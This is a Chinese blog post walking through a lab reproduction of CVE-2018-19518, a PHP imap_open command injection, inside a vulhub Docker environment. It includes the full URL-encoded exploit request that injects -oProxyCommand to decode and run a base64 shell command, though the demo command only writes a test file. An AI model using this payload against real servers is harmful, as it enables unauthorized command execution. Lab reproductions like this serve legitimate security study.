PHP--远程命令执行漏洞CVE-2018-19518复现

最新推荐文章于 2022-10-03 16:55:09 发布
最新推荐文章于 2022-10-03 16:55:09 发布
阅读量565 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: docker php ubuntu 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56123950/article/details/118312841
版权

目录

漏洞介绍

-php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。
-debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。
-ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞。
-ProxyCommand用来指定连接到服务器的命令. 其可以是任何的命令,只要能从其标准输入读入数据,然后写出到标准输出即可. 这条命令需要连接到sshd服务器上。

漏洞复现

首先进入环境,最好在root权限下进行

cd vulhub/php/CVE-2018-19518

然后我们进入到该目录下使用docker启动

docker-compose build
docker-compose up -d

在这里插入图片描述
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包

在这里插入图片描述
使用burp进行抓包,并发送到Repeater里
在这里插入图片描述
然后我们修改数据包,添加一段执行代码
例如 echo ‘Hello’>/tmp/test,对它进行base64编码
ZWNobyAYSGVsbG8ZPi90bXAvdGVzdA==
在这里插入图片描述
这里-oProxyCommand 表示使用该参数。
%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。

hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222

点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功
在这里插入图片描述

进入容器

这里我们进入容器查看刚才文件是否创建成功,先查询id

docker ps -a

查看容器id后在下面命令中输入id进入

docker exec -it ID /bin/bash

进入到tmp目录下查看文件

cd /tmp
ls -al
cat test

在这里插入图片描述
这里我们可以发现刚刚test文件创建成功

移除环境

做完实验以后先不要关闭当前界面,移除环境关闭镜像。

docker-compose down
# 关闭正在运行的容器,删除所有相关的容器,移除NAT(docker-compose在运行的时候会创建一个NAT网段)
从不专注的人
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
PHP imap 远程命令执行漏洞复现CVE-2018-19518
0xSec
12-27 1048
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
PHP imap 远程命令执行漏洞CVE-2018-19518
大方子
08-04 4361
受影响版本 Ubuntuhttps://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-19518.html Debianhttps://security-tracker.debian.org/tracker/CVE-2018-19518 Red Hathttps://access.redhat.com/security/...
PHP imap 远程命令执行漏洞CVE-2018-19518复现
thelostworld
05-12 721
实战项目遇到:做一下,本地靶机测试。看看有没有利用方式一、漏洞描述php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。二、漏洞环境https://github.com/vulhub/vu
CVE-2018-19518复现 imap_open()
heySister
03-22 2916
CVE-2018-19518 前几天时候无聊翻了一下安恒杯2月的月赛题目,看到有一道是用了跟imap_open()这个函数有关的webshell,去查了一下,发现是个CVE。emm…刚开始查到的是freebuf上面的一个文章,还有另外一个一模一样的,也不知道是谁抄谁,还是都是翻译的国外的
PHP imap 远程命令执行漏洞 CVE-2018-19518 漏洞复现
ADummy的博客
02-25 279
PHP imap 远程命令执行漏洞CVE-2018-19518) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令
cve漏洞复现php,CVE-2019-11043 远程代码执行漏洞复现
weixin_30405507的博客
03-19 146
影响范围在使用 Nginx+php+fpm 的服务器上,使用如下配置,都有可能存在远程代码执行漏洞location ~ [^/]\.php(/|$) {...fastcgi_split_path_info ^(.+?\.php)(/.*)$;fastcgi_param PATH_INFO $fastcgi_path_info;fastcgi_pass php:9000;}漏洞复现这...
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
CVE-2018-0886 CVE-2018-0886 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886) windows安全漏洞修复,亲测有效
P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞CVE-2018-19518
在下小黄的博客
03-19 456
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞CVE-2018-19518) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月19日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 PHP imap 远程命令执行漏洞CVE-2018-19518)一级目录二级目录三级目录 一级目录 二级目录 三级目录 各位路过的朋友,如果觉得可
CVE-2019-11043(php-fpm & nginx RCE远程命令执行漏洞复现)
大哥一声吼
10-28 3257
写在前边 利用条件比较苛刻,各位看官看一下就好了 复现环境 ubuntu:Linux kk-machine 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux go:go version go1.13.3 linux/amd64 go 环境安...
CTFSHOW PHPCVE复现
snowlyzz的博客
10-03 863
PHPCVE 复现学习
cve漏洞复现php,PHP-FPM 远程代码执行漏洞CVE-2019-11043)的简单复现学习
weixin_42300400的博客
03-19 263
1.概述漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码...
cve漏洞复现php,CVE-2016-7124php反序列化漏洞复现
weixin_42557830的博客
03-19 409
CVE-2016-7124php反序列化漏洞复现0X00漏洞原因如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行0X01漏洞影响版本PHP5 < 5.6.25PHP7 < 7.0.100X02漏洞详情PHP(PHP:HypertextPreproce...
CTFSHOW--PHPCVE复现
qq_49422880的博客
02-22 3250
CTFSHOW--PHPCVE复现web311[CVE-2019-11043]web312(CVE-2018-19518)web313(CVE-2018-19518)web314:(日志文件包含)web315:(XDebug 远程调试漏洞) web311[CVE-2019-11043] web312(CVE-2018-19518) 同样,没有任何的界面就直接抓包,发现是X-Powered-By: PHP/5.6.38,网上搜索发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。 简介:
PHP远程代码执行漏洞CVE-2019-11043分析
五侠的博客
05-24 752
PHP远程代码执行漏洞CVE-2019-11043分析 CVE-2019-11043是一种2019年出现的PHP远程代码执行漏洞 Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空,最终可导致任意代码执行。 利用条件 PHP版本7及fastcgi协议 PHP7以上,使用fpm形式处理请求,需要使用fastcgi协议,并且利用nginx的正则实现pathinfo和filename分离,例如:inidex.php/artic
PHP 远程命令执行漏洞CVE-2018-19518
qq_46501419的博客
03-21 859
CVE-2018-19518详细信息影响范围复现过程 详细信息 在PHP和其他产品的imap_open()中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令(借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c),而不会阻止参数注入,如果IMAP服务器名称是不受信任的输入(例如,由Web应用程序的用户输入),并且rsh已被具有不同参数的程序替换,则远程攻击者可能会执行任意OS命令语义。 例如
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值